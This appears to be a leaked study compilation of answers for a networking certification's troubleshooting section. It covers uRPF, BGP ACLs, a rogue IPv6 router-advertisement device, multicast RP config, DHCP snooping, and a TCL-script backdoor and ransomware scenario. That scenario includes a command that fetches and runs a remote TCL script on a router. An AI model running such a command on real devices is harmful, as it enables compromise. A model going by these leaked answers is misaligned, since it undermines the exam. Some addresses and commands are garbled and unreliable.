Professional Documents
Culture Documents
DIAG COMPILATION (Layer1)
DIAG COMPILATION (Layer1)
1
Ticket 5 (uRPF, reply received in wrong interface)
R2
R1
R3
Given: R1-R2, R1-R3 are eBGP; R2-R3 iBGP. R1 configured uRPF on interface e0/2 (connected to R2)
Hint: R1 prefers R1-R3 path to access Web (8.8.8.8 or 0.0.0.0), but Web prefers R2-R1, different path to
access Host 1 (which is behind R1)
When a packet is received at the interface where Unicast RPF and ACLs:
1. Input ACLs are checked
2. Unicast RPF checks to see if the packet has arrived on the best return path by checking FIB table
3. CEF lookup is carried out for packet forwarding
4. Output ACLs are checked
5. The packet is forwarded
2
Ticket 6 (BGP Policy, ACL)
R2
R1
R3
3
Hint: No uRPF in this ticket. Input ACL is configured on R1’s eth1/0, link to R2.
Description:
No IPv6 connection from LAN to Internet. CE1 and CE2 are configured in HSRP for IPv6, CE1 is
Active with Router-Preference Low and HSRP priority 200, CE2 is Standby with Router-
Preference High and HSRP priority 100. HSRP Preemption is configured on both.
Issue
Router with Higher Router-Preference. Check console logs on Host, default route is pointing to
FE80:::666. (because the router with higher Router-preference, must have been configured with
higher HSRP priority. Only one router in HSRP groups is active, and current Active HSRP has
“Low” router-preference, but there is rouge device in LAN which has “Medium” better router-
preference, and hosts use information ND RA from Rouge device and select it as Gateway)
Resolve
Set HSRP priority on CE2 to Highest (So it would become Active and start making Router
Advertisements with Route-Preference High)
Which line on Wireshark
You may filter the RA, “icmpv6.type==134” or “icmpv6.nd.ra.flag.prf” The first RA frame
from ffe::666 is the answer (sequence number: 227, note it can be different and you may need
to search)
Other feedbacks:
Quick Solve
Answer: Static (or mroute) route on R3 to RP (R4) ip route 10.1.4.1 0.0.0.0 10.0.0.17
Another Version:
Which device?
Answer: R2
Cause
Answer: wrong RP config
Resolve
Answer: Ask RP Config
5
---NEWEST DIAG---
DHCP Snooping
Additional Information
Server1 = new install, cannot get DHCP IP from R1
Server2 = new install, successfully retrieved DHCP IP Address from R1.
R1 = DHCP server
SW1/SW2 = L2 only – Snooping only
SW3/SW4 = L2+L3.
SW1 is DHCP Snooping. All interfaces are trusted, even the access ports, with [ip dhcp-snooping
trust]. SW1 is also passing Option 82 data upstream.
SW3 is DHCP Relay with [ip dhcp relay information option] configured.
SW3 does NOT have [ip dhcp relay information trust-all] configured.
The packet capture shows DHCP-Discover messages only (in relation to DHCP). The packets are
tagged with dot1q.
Packets for DHCP-Offer, Request, and Accept are never seen
6
TCL Script
Question 1
(Shows a PCAP)
Filter wireshark with http.request.method==GET that will show you who GET the TCL
Script and who sends (the source who do a GET is the victim/router)
With those IP´s (Source/Victim and Hacker) you can eliminate 4 out of 9 answers.
To eliminate the last one you select: Hacker is trying to install ransomware via backdoor (the
other option is exact the opposite), so it´s easy to select the correct answers!
For Understanding.
1. HTTP session from A to B (A clicks a link that it shouldn't and goes to B's fishing website.)
2. TCL script downloaded from B (A is the one running 'get' command, and downloads tcl from B
3. TCP session from B to A (After A runs tcl, it creates a backdoor port on itself and B connects to A
using this newly created backdoor.)
4. Ransomware is installed by backdoor (B installs a ransomware to A using backdoor previously
created)
-========
Question 2
Which command use to execute the attack?
a. sherkfest
b. sudo poweroff
c. tclsh:/ copy flash via http(tclsh http://<victim_ip_address>/b2d.tcl (maybe the tcl name changes
in your exam).
7
Question 3
Which command if issued from the hacker end can bring down the complete system?
a. sudo poweroff
Question 4
How to quickly fix this problem?
a. e kill, kill the process.